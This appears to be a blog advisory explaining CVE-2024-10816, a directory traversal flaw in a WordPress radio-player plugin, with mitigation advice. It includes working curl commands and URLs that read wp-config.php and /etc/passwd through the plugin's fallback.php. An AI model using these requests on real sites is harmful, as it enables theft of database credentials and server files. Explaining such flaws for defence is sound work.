---
In early 2024, a serious security vulnerability (CVE-2024-10816) was discovered in the LUNA RADIO PLAYER plugin for WordPress. This bug affects all versions up to and including 6.24.01.24, threatening the integrity and security of millions of WordPress websites using this plugin. This deep-dive post will explain in simple terms what the bug is, how it can be exploited, and how you can protect your site.
What’s The Problem?
LUNA RADIO PLAYER lets website owners easily embed internet radio stations on their WordPress sites. However, the plugin’s file js/fallback.php does not properly protect against "directory traversal," a trick attackers use to read sensitive files on a server that they shouldn’t have access to.
Vulnerability in short:
Through a specially crafted URL, anyone on the internet can read any file on your web server, including sensitive ones like your WordPress configuration file.
No authentication needed — attackers do not need to log in or register to exploit this flaw.
- Potential data exposure — critical files like wp-config.php (holding DB passwords and keys) can be accessed and stolen.
How Does Directory Traversal Work?
Web servers store files in folders ("directories"). Most plugins restrict what files you can ask for. But directory traversal lets attackers use special characters — like ../ — to "climb" outside the intended folder and read system files.
File Affected
- Path: wp-content/plugins/luna-radio-player/js/fallback.php
Example of Exploitation
Suppose your website is:
https://yourwebsite.com
The attacker can access any file (if file permissions allow), like the WordPress configuration file, using a URL pattern like this:
https://yourwebsite.com/wp-content/plugins/luna-radio-player/js/fallback.php?file=../../../wp-config.php
The file parameter is directly controlled by whoever crafts the URL. By adding multiple ../, attackers can navigate outside the plugin directory and grab files elsewhere on the server.
Sample Exploitation Code (Using Curl)
curl "https://yourwebsite.com/wp-content/plugins/luna-radio-player/js/fallback.php?file=../../../wp-config.php"
If the site is vulnerable, you’ll receive the contents of wp-config.php directly in your terminal!
Official References
- WordFence Advisory
- WPScan Entry
Example: Reading /etc/passwd
curl "https://yourwebsite.com/wp-content/plugins/luna-radio-player/js/fallback.php?file=../../../../../../etc/passwd"
If successful, you’ll see the contents of the Linux server’s user accounts file.
Example: Reading WordPress Secrets
curl "https://yourwebsite.com/wp-content/plugins/luna-radio-player/js/fallback.php?file=../../../wp-config.php"
How To Fix Or Prevent This?
1. Update the Plugin:
The LUNA RADIO PLAYER plugin developers should release a fixed version. Check the plugin page on WordPress.org for updates, and always keep your plugins current.
2. Disable or Remove the Plugin:
If no fix is available, disable the plugin until an update is released.
3. Restrict Direct Access:
Use an .htaccess rule or similar web server setting to deny direct access to fallback.php for everyone except your web application.
Example for Apache
<Files "fallback.php">
Require all denied
</Files>
What Should I Do Now?
- Scan your website with security plugins like Wordfence or WPScan.
Set strong database credentials and rotate them if you suspect exposure.
- Consider using the WP hardening guide for added protection.
Final Notes
The LUNA RADIO PLAYER plugin’s directory traversal vulnerability (CVE-2024-10816) is critical. It’s easy for hackers to use, requires zero authentication, and can expose your most sensitive files. If you use this plugin — or manage WordPress sites for others — act urgently to update, disable, or patch LUNA RADIO PLAYER and review your site for signs of intrusion.
Stay informed:
- National Vulnerability Database: CVE-2024-10816
- OWASP Directory Traversal
Got questions? Leave a comment below or check with your web hosting support for emergency help.
Remember: The weakest plugin can endanger your whole site. Always update, audit, and stay secure!
Timeline
Published on: 11/13/2024 04:15:04 UTC
Last modified on: 11/13/2024 17:01:16 UTC